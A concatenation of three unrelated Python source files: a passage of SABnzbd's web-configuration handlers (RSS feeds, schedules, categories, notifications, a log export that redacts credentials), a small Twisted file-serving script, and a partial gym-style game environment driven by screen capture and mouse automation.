uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_feed(self, **kwargs):
""" Update Feed level attributes """
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
if 'enable' not in kwargs:
kwargs['enable'] = 0
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def toggle_rss_feed(self, **kwargs):
""" Toggle automatic read-out flag of Feed """
try:
item = config.get_rss()[kwargs.get('feed')]
except KeyError:
item = None
if cfg:
item.enable.set(not item.enable())
config.save_config()
if kwargs.get('table'):
raise Raiser(self.__root)
else:
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def add_rss_feed(self, **kwargs):
""" Add one new RSS feed definition """
feed = Strip(kwargs.get('feed')).strip('[]')
uri = Strip(kwargs.get('uri'))
if feed and uri:
try:
cfg = config.get_rss()[feed]
except KeyError:
cfg = None
if (not cfg) and uri:
kwargs['feed'] = feed
kwargs['uri'] = uri
config.ConfigRSS(feed, kwargs)
# Clear out any existing reference to this feed name
# Otherwise first-run detection can fail
sabnzbd.rss.clear_feed(feed)
config.save_config()
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
else:
raise Raiser(self.__root)
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_upd_rss_filter(**kwargs)
def internal_upd_rss_filter(self, **kwargs):
""" Save updated filter definition """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
pp = kwargs.get('pp')
if IsNone(pp):
pp = ''
script = ConvertSpecials(kwargs.get('script'))
cat = ConvertSpecials(kwargs.get('cat'))
prio = ConvertSpecials(kwargs.get('priority'))
filt = kwargs.get('filter_text')
enabled = kwargs.get('enabled', '0')
if filt:
feed_cfg.filters.update(int(kwargs.get('index', 0)), (cat, pp, script, kwargs.get('filter_type'),
filt, prio, enabled))
# Move filter if requested
index = int_conv(kwargs.get('index', ''))
new_index = kwargs.get('new_index', '')
if new_index and int_conv(new_index) != index:
feed_cfg.filters.move(int(index), int_conv(new_index))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_feed(self, *args, **kwargs):
""" Remove complete RSS feed """
kwargs['section'] = 'rss'
kwargs['keyword'] = kwargs.get('feed')
del_from_section(kwargs)
sabnzbd.rss.clear_feed(kwargs.get('feed'))
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_del_rss_filter(**kwargs)
def internal_del_rss_filter(self, **kwargs):
""" Remove one RSS filter """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
feed_cfg.filters.delete(int(kwargs.get('index', 0)))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download_rss_feed(self, *args, **kwargs):
""" Force download of all matching jobs in a feed """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = True
self.__refresh_force = True
self.__refresh_ignore = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def clean_rss_jobs(self, *args, **kwargs):
""" Remove processed RSS jobs from UI """
sabnzbd.rss.clear_downloaded(kwargs['feed'])
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def test_rss_feed(self, *args, **kwargs):
""" Read the feed content again and show results """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
self.__show_eval_button = False
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def eval_rss_feed(self, *args, **kwargs):
""" Re-apply the filters to the feed """
if 'feed' in kwargs:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
self.__show_eval_button = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download(self, **kwargs):
""" Download NZB from provider (Download button) """
feed = kwargs.get('feed')
url = kwargs.get('url')
nzbname = kwargs.get('nzbname')
att = sabnzbd.rss.lookup_url(feed, url)
if att:
pp = att.get('pp')
cat = att.get('cat')
script = att.get('script')
prio = att.get('prio')
if url:
sabnzbd.add_url(url, pp, script, cat, prio, nzbname)
# Need to pass the title instead
sabnzbd.rss.flag_downloaded(feed, url)
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def rss_now(self, *args, **kwargs):
""" Run an automatic RSS run now """
scheduler.force_rss()
raise rssRaiser(self.__root, kwargs)
def ConvertSpecials(p):
""" Convert None to 'None' and 'Default' to '' """
if p is None:
p = 'None'
elif p.lower() == T('Default').lower():
p = ''
return p
def IsNone(value):
""" Return True if either None, 'None' or '' """
return value is None or value == "" or value.lower() == 'none'
def Strip(txt):
""" Return stripped string, can handle None """
try:
return txt.strip()
except:
return None
##############################################################################
_SCHED_ACTIONS = ('resume', 'pause', 'pause_all', 'shutdown', 'restart', 'speedlimit',
'pause_post', 'resume_post', 'scan_folder', 'rss_scan', 'remove_failed',
'remove_completed', 'pause_all_low', 'pause_all_normal', 'pause_all_high',
'resume_all_low', 'resume_all_normal', 'resume_all_high',
'enable_quota', 'disable_quota'
)
class ConfigScheduling:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def get_days():
days = {"*": T('Daily'), "1": T('Monday'), "2": T('Tuesday'), "3": T('Wednesday'), "4": T('Thursday'),
"5": T('Friday'), "6": T('Saturday'), "7": T('Sunday')}
return days
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
actions = []
actions.extend(_SCHED_ACTIONS)
day_names = get_days()
categories = list_cats(False)
snum = 1
conf['schedlines'] = []
conf['taskinfo'] = []
for ev in scheduler.sort_schedules(all_events=False):
line = ev[3]
conf['schedlines'].append(line)
try:
enabled, m, h, day_numbers, action = line.split(' ', 4)
except:
continue
action = action.strip()
try:
action, value = action.split(' ', 1)
except:
value = ''
value = value.strip()
if value and not value.lower().strip('0123456789kmgtp%.'):
if '%' not in value and from_units(value) < 1.0:
value = T('off') # : "Off" value for speedlimit in scheduler
else:
if '%' not in value and 1 < int_conv(value) < 101:
value += '%'
value = value.upper()
if action in actions:
action = Ttemplate("sch-" + action)
else:
if action in ('enable_server', 'disable_server'):
try:
value = '"%s"' % config.get_servers()[value].displayname()
except KeyError:
value = '"%s" <<< %s' % (value, T('Undefined server!'))
action = Ttemplate("sch-" + action)
if action in ('pause_cat', 'resume_cat'):
action = Ttemplate("sch-" + action)
if value not in categories:
# Category name change
value = '"%s" <<< %s' % (value, T('Incorrect parameter'))
else:
value = '"%s"' % value
if day_numbers == "1234567":
days_of_week = "Daily"
elif day_numbers == "12345":
days_of_week = "Weekdays"
elif day_numbers == "67":
days_of_week = "Weekends"
else:
days_of_week = ", ".join([day_names.get(i, "**") for i in day_numbers])
item = (snum, '%02d' % int(h), '%02d' % int(m), days_of_week, '%s %s' % (action, value), enabled)
conf['taskinfo'].append(item)
snum += 1
actions_lng = {}
for action in actions:
actions_lng[action] = Ttemplate("sch-" + action)
actions_servers = {}
servers = config.get_servers()
for srv in servers:
actions_servers[srv] = servers[srv].displayname()
conf['actions_servers'] = actions_servers
conf['actions'] = actions
conf['actions_lng'] = actions_lng
conf['categories'] = categories
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_scheduling.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addSchedule(self, **kwargs):
servers = config.get_servers()
minute = kwargs.get('minute')
hour = kwargs.get('hour')
days_of_week = ''.join([str(x) for x in kwargs.get('daysofweek', '')])
if not days_of_week:
days_of_week = '1234567'
action = kwargs.get('action')
arguments = kwargs.get('arguments')
arguments = arguments.strip().lower()
if arguments in ('on', 'enable'):
arguments = '1'
elif arguments in ('off', 'disable'):
arguments = '0'
if minute and hour and days_of_week and action:
if action == 'speedlimit':
if not arguments or arguments.strip('0123456789kmgtp%.'):
arguments = 0
elif action in _SCHED_ACTIONS:
arguments = ''
elif action in servers:
if arguments == '1':
arguments = action
action = 'enable_server'
else:
arguments = action
action = 'disable_server'
elif action in ('pause_cat', 'resume_cat'):
# Need original category name, not lowercased
arguments = arguments.strip()
else:
# Something else, leave empty
action = None
if action:
sched = cfg.schedules()
sched.append('%s %s %s %s %s %s' %
(1, minute, hour, days_of_week, action, arguments))
cfg.schedules.set(sched)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line and line in schedules:
schedules.remove(line)
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line:
for i, schedule in enumerate(schedules):
if schedule == line:
# Toggle the schedule
schedule_split = schedule.split()
schedule_split[0] = '%d' % (schedule_split[0] == '0')
schedules[i] = ' '.join(schedule_split)
break
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
##############################################################################
class ConfigCats:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
conf['defdir'] = cfg.complete_dir.get_clipped_path()
categories = config.get_ordered_categories()
conf['have_cats'] = len(categories) > 1
slotinfo = []
for cat in categories:
cat['newzbin'] = cat['newzbin'].replace('"', '"')
slotinfo.append(cat)
# Add empty line
empty = {'name': '', 'order': '0', 'pp': '-1', 'script': '', 'dir': '', 'newzbin': '', 'priority': DEFAULT_PRIORITY}
slotinfo.insert(1, empty)
conf['slotinfo'] = slotinfo
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_cat.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def delete(self, **kwargs):
kwargs['section'] = 'categories'
kwargs['keyword'] = kwargs.get('name')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def save(self, **kwargs):
name = kwargs.get('name', '*')
if name == '*':
newname = name
else:
newname = re.sub('"', '', kwargs.get('newname', ''))
if newname:
# Check if this cat-dir is not sub-folder of incomplete
if same_file(cfg.download_dir.get_path(), real_path(cfg.complete_dir.get_path(), kwargs['dir'])):
return T('Category folder cannot be a subfolder of the Temporary Download Folder.')
# Delete current one and replace with new one
if name:
config.delete('categories', name)
config.ConfigCat(newname.lower(), kwargs)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SORT_LIST = (
'enable_tv_sorting', 'tv_sort_string', 'tv_categories',
'enable_movie_sorting', 'movie_sort_string', 'movie_sort_extra', 'movie_extra_folder',
'enable_date_sorting', 'date_sort_string', 'movie_categories', 'date_categories'
)
class ConfigSorting:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['complete_dir'] = cfg.complete_dir.get_clipped_path()
for kw in SORT_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['categories'] = list_cats(False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_sorting.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSorting(self, **kwargs):
try:
kwargs['movie_categories'] = kwargs['movie_cat']
except:
pass
try:
kwargs['date_categories'] = kwargs['date_cat']
except:
pass
try:
kwargs['tv_categories'] = kwargs['tv_cat']
except:
pass
for kw in SORT_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
LOG_API_RE = re.compile(b"(apikey|api)(=|:)[\w]+", re.I)
LOG_API_JSON_RE = re.compile(b"'(apikey|api)': '[\w]+'", re.I)
LOG_USER_RE = re.compile(b"(user|username)\s?=\s?[\S]+", re.I)
LOG_PASS_RE = re.compile(b"(password)\s?=\s?[\S]+", re.I)
LOG_INI_HIDE_RE = re.compile(b"(email_pwd|email_account|email_to|rating_api_key|pushover_token|pushover_userkey|pushbullet_apikey|prowl_apikey|growl_password|growl_server|IPv[4|6] address)\s?=\s?[\S]+", re.I)
LOG_HASH_RE = re.compile(b"([a-fA-F\d]{25})", re.I)
class Status:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
header = build_status(skip_dashboard=kwargs.get('skip_dashboard'))
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'status.tmpl'),
searchList=[header], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def reset_quota(self, **kwargs):
BPSMeter.do.reset_quota(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def disconnect(self, **kwargs):
Downloader.do.disconnect()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def refresh_conn(self, **kwargs):
# No real action, just reload the page
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def showlog(self, **kwargs):
try:
sabnzbd.LOGHANDLER.flush()
except:
pass
# Fetch the INI and the log-data and add a message at the top
log_data = b'--------------------------------\n\n'
log_data += b'The log includes a copy of your sabnzbd.ini with\nall usernames, passwords and API-keys removed.'
log_data += b'\n\n--------------------------------\n'
log_data += open(sabnzbd.LOGFILE, "rb").read()
log_data += open(config.get_filename(), 'rb').read()
# We need to remove all passwords/usernames/api-keys
log_data = LOG_API_RE.sub(b"apikey=<APIKEY>", log_data)
log_data = LOG_API_JSON_RE.sub(b"'apikey':<APIKEY>'", log_data)
log_data = LOG_USER_RE.sub(b'\g<1>=<USER>', log_data)
log_data = LOG_PASS_RE.sub(b"password=<PASSWORD>", log_data)
log_data = LOG_INI_HIDE_RE.sub(b"\\1 = <REMOVED>", log_data)
log_data = LOG_HASH_RE.sub(b"<HASH>", log_data)
# Try to replace the username
try:
import getpass
cur_user = getpass.getuser()
if cur_user:
log_data = log_data.replace(utob(cur_user), b'<USERNAME>')
except:
pass
# Set headers
cherrypy.response.headers['Content-Type'] = 'application/x-download;charset=utf-8'
cherrypy.response.headers['Content-Disposition'] = 'attachment;filename="sabnzbd.log"'
return log_data
@secured_expose(check_session_key=True)
def clearwarnings(self, **kwargs):
sabnzbd.GUIHANDLER.clear()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def change_loglevel(self, **kwargs):
cfg.log_level.set(kwargs.get('loglevel'))
config.save_config()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def unblock_server(self, **kwargs):
Downloader.do.unblock(kwargs.get('server'))
# Short sleep so that UI shows new server status
time.sleep(1.0)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
orphan_delete(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete_all(self, **kwargs):
orphan_delete_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add(self, **kwargs):
orphan_add(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add_all(self, **kwargs):
orphan_add_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def dashrefresh(self, **kwargs):
# This function is run when Refresh button on Dashboard is clicked
# Put the time consuming dashboard functions here; they only get executed when the user clicks the Refresh button
# PyStone
sabnzbd.PYSTONE_SCORE = getpystone()
# Diskspeed of download (aka incomplete) directory:
dir_speed = diskspeedmeasure(sabnzbd.cfg.download_dir.get_path())
if dir_speed:
sabnzbd.DOWNLOAD_DIR_SPEED = round(dir_speed, 1)
else:
sabnzbd.DOWNLOAD_DIR_SPEED = 0
time.sleep(1.0)
# Diskspeed of complete directory:
dir_speed = diskspeedmeasure(sabnzbd.cfg.complete_dir.get_path())
if dir_speed:
sabnzbd.COMPLETE_DIR_SPEED = round(dir_speed, 1)
else:
sabnzbd.COMPLETE_DIR_SPEED = 0
# Internet bandwidth
sabnzbd.INTERNET_BANDWIDTH = round(internetspeed(), 1)
raise Raiser(self.__root) # Refresh screen
def orphan_delete(kwargs):
path = kwargs.get('name')
if path:
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Removing orphaned job %s', path)
remove_all(path, recursive=True)
def orphan_delete_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_delete(kwargs)
def orphan_add(kwargs):
path = kwargs.get('name')
if path:
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Re-adding orphaned job %s', path)
NzbQueue.do.repair_job(path, None, None)
def orphan_add_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_add(kwargs)
def badParameterResponse(msg, ajax=None):
""" Return a html page with error message and a 'back' button """
if ajax:
return sabnzbd.api.report('json', error=msg)
else:
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>SABnzbd %s - %s</title>
</head>
<body>
<h3>%s</h3>
%s
<br><br>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
</body>
</html>
''' % (sabnzbd.__version__, T('ERROR:'), T('Incorrect parameter'), msg, T('Back'))
def ShowString(name, msg):
""" Return a html page listing a file and a 'back' button """
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>%s</title>
</head>
<body>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
<h3>%s</h3>
<code><pre>%s</pre></code>
</body>
</html>
''' % (xml_name(name), T('Back'), xml_name(name), escape(msg))
def GetRssLog(feed):
def make_item(job):
# Make a copy
job = job.copy()
# Now we apply some formatting
job['title'] = job['title']
job['skip'] = '*' * int(job.get('status', '').endswith('*'))
# These fields could be empty
job['cat'] = job.get('cat', '')
job['size'] = job.get('size', '')
job['infourl'] = job.get('infourl', '')
# Auto-fetched jobs didn't have these fields set
if job.get('url'):
job['baselink'] = get_base_url(job.get('url'))
if sabnzbd.rss.special_rss_site(job.get('url')):
job['nzbname'] = ''
else:
job['nzbname'] = job['title']
else:
job['baselink'] = ''
job['nzbname'] = job['title']
if job.get('size', 0):
job['size_units'] = to_units(job['size'])
else:
job['size_units'] = '-'
# And we add extra fields for sorting
if job.get('age', 0):
job['age_ms'] = time.mktime(job['age'].timetuple())
job['age'] = calc_age(job['age'], True)
else:
job['age_ms'] = ''
job['age'] = ''
if job.get('time_downloaded'):
job['time_downloaded_ms'] = time.mktime(job['time_downloaded'])
job['time_downloaded'] = time.strftime(time_format('%H:%M %a %d %b'), job['time_downloaded'])
else:
job['time_downloaded_ms'] = ''
job['time_downloaded'] = ''
return job
jobs = list(sabnzbd.rss.show_result(feed).values())
good, bad, done = ([], [], [])
for job in jobs:
if job['status'][0] == 'G':
good.append(make_item(job))
elif job['status'][0] == 'B':
bad.append(make_item(job))
elif job['status'] == 'D':
done.append(make_item(job))
try:
# Sort based on actual age, in try-catch just to be sure
good.sort(key=lambda job: job['age_ms'], reverse=True)
bad.sort(key=lambda job: job['age_ms'], reverse=True)
done.sort(key=lambda job: job['time_downloaded_ms'], reverse=True)
except:
# Let the javascript do it then..
pass
return done, good, bad
##############################################################################
LIST_EMAIL = (
'email_endjob', 'email_cats', 'email_full',
'email_server', 'email_to', 'email_from',
'email_account', 'email_pwd', 'email_rss'
)
LIST_NCENTER = ('ncenter_enable', 'ncenter_cats',
'ncenter_prio_startup', 'ncenter_prio_download', 'ncenter_prio_pp', 'ncenter_prio_complete', 'ncenter_prio_failed',
'ncenter_prio_disk_full', 'ncenter_prio_warning', 'ncenter_prio_error', 'ncenter_prio_queue_done', 'ncenter_prio_other',
'ncenter_prio_new_login')
LIST_ACENTER = ('acenter_enable', 'acenter_cats',
'acenter_prio_startup', 'acenter_prio_download', 'acenter_prio_pp', 'acenter_prio_complete', 'acenter_prio_failed',
'acenter_prio_disk_full', 'acenter_prio_warning', 'acenter_prio_error', 'acenter_prio_queue_done', 'acenter_prio_other',
'acenter_prio_new_login')
LIST_NTFOSD = ('ntfosd_enable', 'ntfosd_cats',
'ntfosd_prio_startup', 'ntfosd_prio_download', 'ntfosd_prio_pp', 'ntfosd_prio_complete', 'ntfosd_prio_failed',
'ntfosd_prio_disk_full', 'ntfosd_prio_warning', 'ntfosd_prio_error', 'ntfosd_prio_queue_done', 'ntfosd_prio_other',
'ntfosd_prio_new_login')
LIST_PROWL = ('prowl_enable', 'prowl_cats', 'prowl_apikey',
'prowl_prio_startup', 'prowl_prio_download', 'prowl_prio_pp', 'prowl_prio_complete', 'prowl_prio_failed',
'prowl_prio_disk_full', 'prowl_prio_warning', 'prowl_prio_error', 'prowl_prio_queue_done', 'prowl_prio_other',
'prowl_prio_new_login')
LIST_PUSHOVER = ('pushover_enable', 'pushover_cats', 'pushover_token', 'pushover_userkey', 'pushover_device',
'pushover_prio_startup', 'pushover_prio_download', 'pushover_prio_pp', 'pushover_prio_complete', 'pushover_prio_failed',
'pushover_prio_disk_full', 'pushover_prio_warning', 'pushover_prio_error', 'pushover_prio_queue_done', 'pushover_prio_other',
'pushover_prio_new_login', 'pushover_emergency_retry', 'pushover_emergency_expire')
LIST_PUSHBULLET = ('pushbullet_enable', 'pushbullet_cats', 'pushbullet_apikey', 'pushbullet_device',
'pushbullet_prio_startup', 'pushbullet_prio_download', 'pushbullet_prio_pp', 'pushbullet_prio_complete', 'pushbullet_prio_failed',
'pushbullet_prio_disk_full', 'pushbullet_prio_warning', 'pushbullet_prio_error', 'pushbullet_prio_queue_done', 'pushbullet_prio_other',
'pushbullet_prio_new_login')
LIST_NSCRIPT = ('nscript_enable', 'nscript_cats', 'nscript_script', 'nscript_parameters',
'nscript_prio_startup', 'nscript_prio_download', 'nscript_prio_pp', 'nscript_prio_complete', 'nscript_prio_failed',
'nscript_prio_disk_full', 'nscript_prio_warning', 'nscript_prio_error', 'nscript_prio_queue_done', 'nscript_prio_other',
'nscript_prio_new_login')
class ConfigNotify:
def __init__(self, root):
self.__root = root
self.__lastmail = None
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['categories'] = list_cats(False)
conf['lastmail'] = self.__lastmail
conf['have_ntfosd'] = sabnzbd.notifier.have_ntfosd()
conf['have_ncenter'] = sabnzbd.DARWIN and sabnzbd.FOUNDATION
conf['scripts'] = list_scripts(default=False, none=True)
for kw in LIST_EMAIL:
conf[kw] = config.get_config('misc', kw).get_string()
for kw in LIST_PROWL:
conf[kw] = config.get_config('prowl', kw)()
for kw in LIST_PUSHOVER:
conf[kw] = config.get_config('pushover', kw)()
for kw in LIST_PUSHBULLET:
conf[kw] = config.get_config('pushbullet', kw)()
for kw in LIST_NCENTER:
conf[kw] = config.get_config('ncenter', kw)()
for kw in LIST_ACENTER:
conf[kw] = config.get_config('acenter', kw)()
for kw in LIST_NTFOSD:
conf[kw] = config.get_config('ntfosd', kw)()
for kw in LIST_NSCRIPT:
conf[kw] = config.get_config('nscript', kw)()
conf['notify_keys'] = sabnzbd.constants.NOTIFY_KEYS
conf['notify_texts'] = sabnzbd.notifier.NOTIFICATION
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_notify.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveEmail(self, **kwargs):
ajax = kwargs.get('ajax')
for kw in LIST_EMAIL:
msg = config.get_config('misc', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NCENTER:
msg = config.get_config('ncenter', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_ACENTER:
msg = config.get_config('acenter', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NTFOSD:
msg = config.get_config('ntfosd', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PROWL:
msg = config.get_config('prowl', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PUSHOVER:
msg = config.get_config('pushover', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PUSHBULLET:
msg = config.get_config('pushbullet', kw).set(kwargs.get(kw, 0))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NSCRIPT:
msg = config.get_config('nscript', kw).set(kwargs.get(kw, 0))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
config.save_config()
self.__lastmail = None
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
|
streaming.py
|
#!/usr/bin/env python3
# encoding: UTF-8
import os
import socket
import threading
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
from twisted.web.static import File
# from twisted.python import log
def set_files(files, serve_ip, serve_port):
files_index = {file_key: (os.path.basename(file_path),
os.path.abspath(file_path),
os.path.dirname(os.path.abspath(file_path)))
for file_key, file_path in files.items()}
files_serve = {file_name: file_path
for file_name, file_path, file_dir in files_index.values()}
files_urls = {
file_key: "http://{0}:{1}/{2}/{3}".format(
serve_ip, serve_port, file_key, file_name)
for file_key, (file_name, file_path, file_dir)
in files_index.items()}
return files_index, files_serve, files_urls
def start_server(files, serve_ip, serve_port=9000):
# import sys
# log.startLogging(sys.stdout)
files_index, files_serve, files_urls = set_files(
files, serve_ip, serve_port)
root = Resource()
for file_key, (file_name, file_path, file_dir) in files_index.items():
root.putChild(file_key.encode("utf-8"), Resource())
root.children[file_key.encode("utf-8")].putChild(
file_name.encode("utf-8"), File(file_path))
reactor.listenTCP(serve_port, Site(root))
threading.Thread(
target=reactor.run, kwargs={"installSignalHandlers": False}).start()
return files_urls
def get_serve_ip(target_ip, target_port=80):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
serve_ip = s.getsockname()[0]
s.close()
return serve_ip
if __name__ == "__main__":
import sys
files = {"file_{0}".format(i): file_path for i,
file_path in enumerate(sys.argv[1:], 1)}
print(files)
files_urls = start_server(files, "localhost")
print(files_urls)
|
environment.py
|
"""
Copyright (c) <2018> YoongiKim
See the file license.txt for copying permission.
"""
import numpy as np
import cv2
import time
import pyautogui
from RiderEnvironment.grabscreen import grab_screen
from RiderEnvironment import show_window
import threading
from RiderEnvironment import read_score
import gym
## PRESS CTRL + ALT + DEL to stop program
class PreviousFrameMixer:
PreviousFrames = []
def __init__(self, number_of_frames, height, width):
self.height = height
self.width = width
self.len = number_of_frames
self.clear()
def clear(self):
self.PreviousFrames = []
for i in range(self.len):
self.PreviousFrames.append(np.zeros(shape=(self.height, self.width), dtype=np.uint8))
def stack_frame(self, img):
self.PreviousFrames.append(img)
self.PreviousFrames.pop(0)
def get_mixed_frames(self): # mix previous frames by time to reduce memory
result_img = np.zeros(shape=(self.height, self.width), dtype=np.uint8)
for i in range(self.len):
result_img = cv2.addWeighted(result_img, float(i/self.len), self.PreviousFrames[i], float(i+1/self.len), 0)
return np.array(result_img)
class RiderEnv:
LastScore = 0
LastAction = 0
capture_x = 8
capture_y = 120
capture_w = 296
capture_h = 296
obs_w = 100 # Must Change models.py 224 line, 287 line
obs_h = 100
step_count = 0
same_score_count = 0
frame_mixer = PreviousFrameMixer(4, obs_h, obs_w)
def __init__(self):
self.frame_mixer.clear()
self.observation_space = \
gym.spaces.Box(low=0, high=255,
shape=np.zeros(shape=(self.obs_h * self.obs_w), dtype=np.uint8).shape
, dtype=np.uint8)
#self.action_space = gym.spaces.Box(low=0, high=1, shape=np.zeros(1).shape, dtype=np.float32)
self.action_space = gym.spaces.Discrete(2)
def reset(self):
print('env reset')
show_window.ShowWindow()
pyautogui.moveTo(155, 350)
self.LastScore = 0
self.LastAction = 0
self.same_score_count = 0
self.frame_mixer.clear()
self.close_advertise_window()
self.click()
time.sleep(1.5)
self.click()
observation = np.zeros(shape=(self.obs_h, self.obs_w), dtype=np.uint8)
return np.array(observation).flatten()
def step(self, action):
# observation, reward, done, score
self.step_count += 1
if float(action[0]) >= 0.5 and self.LastAction == 0:
#print("mouse down")
self.mouse_down()
self.LastAction = 1
elif float(action[0]) < 0.5 and self.LastAction == 1:
#print("mouse up")
self.mouse_up()
